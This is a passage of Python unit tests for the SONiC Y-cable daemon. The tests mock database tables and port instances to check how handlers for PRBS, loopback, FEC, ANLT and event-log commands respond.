"Ethernet0", mux_info_dict, xcvrd_show_fw_res_tbl)
assert(rc == 0)
@patch('sonic_py_common.device_info.get_paths_to_platform_and_hwsku_dirs', MagicMock(return_value=('/tmp', None)))
@patch('swsscommon.swsscommon.WarmStart', MagicMock())
@patch('ycable.ycable.platform_sfputil', MagicMock())
@patch('ycable.ycable.DaemonYcable.load_platform_util', MagicMock())
def test_DaemonYcable_init_deinit(self):
ycable = DaemonYcable(SYSLOG_IDENTIFIER)
ycable.init()
ycable.deinit()
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "enable", {"mode_value": "0",
"lane_mask": "0",
"direction": "0"})))
def test_handle_config_prbs_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "enable", {"mode_value": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
def test_handle_config_prbs_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "enable", {"mode_value": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_enable(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "disable", {"mode_value": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_disable(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "reset", {"mode_value": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_reset(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "anlt", {"mode": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_anlt_enable(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_anlt.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "anlt", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_anlt_disable(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_anlt.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"mode": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_fec_enable(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_with_instance_fec_disable(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_prbs": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_prbs_cmd_arg_tbl_notification_else_value(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_prbs_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_prbs_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_prbs_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_abc": True}
rc = handle_config_prbs_cmd_arg_tbl_notification(
fvp, xcvrd_config_prbs_cmd_arg_tbl, xcvrd_config_prbs_cmd_sts_tbl, xcvrd_config_prbs_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_else_value(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_loop_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_loop_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_loop_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_abc": True}
rc = handle_config_loop_cmd_arg_tbl_notification(
fvp, xcvrd_config_loop_cmd_arg_tbl, xcvrd_config_loop_cmd_sts_tbl, xcvrd_config_loop_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_else_value(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_loop_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_loop_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_loop_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_loop": True}
rc = handle_config_loop_cmd_arg_tbl_notification(
fvp, xcvrd_config_loop_cmd_arg_tbl, xcvrd_config_loop_cmd_sts_tbl, xcvrd_config_loop_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
def test_handle_config_loop_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_loop_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_loop_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_loop_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_loop": True}
rc = handle_config_loop_cmd_arg_tbl_notification(
fvp, xcvrd_config_loop_cmd_arg_tbl, xcvrd_config_loop_cmd_sts_tbl, xcvrd_config_loop_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_no_instance(self, port_instance, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_loop_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_loop_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_loop_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_loop": True}
rc = handle_config_loop_cmd_arg_tbl_notification(
fvp, xcvrd_config_loop_cmd_arg_tbl, xcvrd_config_loop_cmd_sts_tbl, xcvrd_config_loop_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "enable", {"enable": "0",
"lane_mask": "0",
"mode_value": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_enable(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_loop_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_loop_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_loop_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_loopback_mode.return_value = True
port_instance.disable_loopback_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_loop": True}
rc = handle_config_loop_cmd_arg_tbl_notification(
fvp, xcvrd_config_loop_cmd_arg_tbl, xcvrd_config_loop_cmd_sts_tbl, xcvrd_config_loop_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "disable", {"disable": "0",
"lane_mask": "0",
"mode_value": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_loop_cmd_arg_tbl_notification_disable(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_loop_cmd_arg_tbl = mock_swsscommon_table
xcvrd_config_loop_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_loop_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_loopback_mode.return_value = True
port_instance.disable_loopback_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_loop": True}
rc = handle_config_loop_cmd_arg_tbl_notification(
fvp, xcvrd_config_loop_cmd_arg_tbl, xcvrd_config_loop_cmd_sts_tbl, xcvrd_config_loop_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_else_value(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_event_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_event_rsp_tbl = mock_swsscommon_table
xcvrd_show_event_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.PRBS_DIRECTION_BOTH = 2
port_instance.enable_prbs_mode.return_value = True
port_instance.disable_prbs_mode.return_value = True
port_instance.reset.return_value = True
port_instance.set_fec_mode.return_value = True
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"config_loop": True}
rc = handle_show_event_cmd_arg_tbl_notification(
fvp, xcvrd_show_event_cmd_sts_tbl, xcvrd_show_event_rsp_tbl, xcvrd_show_event_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_get_log(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_event_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_event_rsp_tbl = mock_swsscommon_table
xcvrd_show_event_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_event_log.return_value = ["log 1", "log 2"]
asic_index = 0
port = "Ethernet0"
fvp = {"show_event": True}
rc = handle_show_event_cmd_arg_tbl_notification(
fvp, xcvrd_show_event_cmd_sts_tbl, xcvrd_show_event_rsp_tbl, xcvrd_show_event_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_get_actual_log(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_event_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_event_rsp_tbl = mock_swsscommon_table
xcvrd_show_event_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_event_log.return_value = ["log 1", "log 2"]
port_instance_helper.return_value = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"show_event": True}
rc = handle_show_event_cmd_arg_tbl_notification(
fvp, xcvrd_show_event_cmd_sts_tbl, xcvrd_show_event_rsp_tbl, xcvrd_show_event_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_get_no_log(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_event_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_event_rsp_tbl = mock_swsscommon_table
xcvrd_show_event_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_event_log.return_value = Exception(
NotImplementedError)
asic_index = 0
port = "Ethernet0"
fvp = {"show_event": True}
rc = handle_show_event_cmd_arg_tbl_notification(
fvp, xcvrd_show_event_cmd_sts_tbl, xcvrd_show_event_rsp_tbl, xcvrd_show_event_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
